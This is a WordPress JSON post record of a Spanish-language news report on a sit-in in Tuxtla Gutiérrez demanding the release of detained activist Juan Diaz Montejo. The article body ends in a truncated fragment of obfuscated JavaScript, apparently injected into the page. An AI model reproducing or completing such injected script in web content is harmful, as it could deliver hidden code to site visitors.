{"id":19401,"date":"2024-12-20T03:12:27","date_gmt":"2024-12-20T03:12:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19401"},"modified":"2024-12-20T03:12:28","modified_gmt":"2024-12-20T03:12:28","slug":"inician-planton-para-exigir-liberacion-de-preso","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19401","title":{"rendered":"Inician plant\u00f3n para exigir liberaci\u00f3n de preso"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431-1024x682.jpg\" alt=\"\" class=\"wp-image-19402\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734664116431.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>19 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La Coordinadora Internacional de Solidaridad y por la Libertad de los Presos Pol\u00edticos Revolucionarios del Mundo-Base M\u00e9xico inici\u00f3 un plant\u00f3n en el centro de Tuxtla para exigir la liberaci\u00f3n de Juan Diaz Montejo, quien es miembro del Frente Democr\u00e1tico Revolucionario de Obreros y Campesinos (FDROC).<\/p>\n\n\n\n<p>Los manifestantes relataron que, fue detenido este 17 de diciembre, quien adem\u00e1s forma parte del Secretariado Internacional de la Coordinadora Internacional de Solidaridad y por la Libertad de los Presos Politicos Revolucionarios del Mundo.<\/p>\n\n\n\n<p>\u201cSu detenci\u00f3n arbitraria tuvo como consecuencia inmediata que el licenciado permaneciera en calidad de desaparecido por mas de 10 horas, lo que viola el Estado de Derecho y el debido proceso\u201d, expresaron.<\/p>\n\n\n\n<p>Consideran que, su injusta detenci\u00f3n se da en el marco de los medi\u00e1ticos operativos contra el narcotr\u00e1fico en la ciudad de Comit\u00e1n de Dominguez Chiapas.<\/p>\n\n\n\n<p>Se\u00f1alaron que, dentro del comunicado oficial las autoridades dieron a conocer que: \u201cFue detenido Juan N, l\u00edder de una organizaci\u00f3n que generaba violencia, en el municipio de Comit\u00e1n por lo cual se encuentra tambi\u00e9n recluido y enfrentar\u00e1 la justicia&#8221;.<\/p>\n\n\n\n<p>\u201cEs indignante estas declaraciones por el nuevo gobierno que se dice democr\u00e1tico est\u00e1 haciendo en contra de FEDROC y la Coordinadora. El derrotero del Licenciado Juan Diaz demuestra que siempre ha luchado por mejorar la situaci\u00f3n concreta de las organizaciones y comunidades con base a la organizaci\u00f3n y a la protesta que la constituci\u00f3n protege\u201d, expresaron.<\/p>\n\n\n\n<p>Lamentaron que, en el sexenio pasado tambi\u00e9n le aplicaron la misma politica de inventar cargos para mantenerlo preso de manera injusta, hoy el nuevo gobierno que se dice democr\u00e1tico hacen copia de esa pol\u00edtica.<\/p>\n\n\n\n<p>\u201cPor eso es que repudiamos y denunciamos ante la opini\u00f3n publica este intento de, por una parte, negar que el Licenciado Juan es un militante con profundas convicciones, una ideolog\u00eda que lo lleva a estar cerca del pueblo, de sus justas luchas y ser solidarios con la lucha de los presos pol\u00edticos\u201d,<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 19 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La Coordinadora Internacional de Solidaridad y por la Libertad de los Presos Pol\u00edticos Revolucionarios del Mundo-Base M\u00e9xico inici\u00f3 un plant\u00f3n en el centro de Tuxtla para exigir la liberaci\u00f3n de Juan Diaz Montejo, quien es miembro del Frente Democr\u00e1tico Revolucionario de Obreros y Campesinos (FDROC). &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19402,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19401","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19401","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19401"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19401\/revisions"}],"predecessor-version":[{"id":19403,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19401\/revisions\/19403"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19402"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19401"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19401"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19401"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}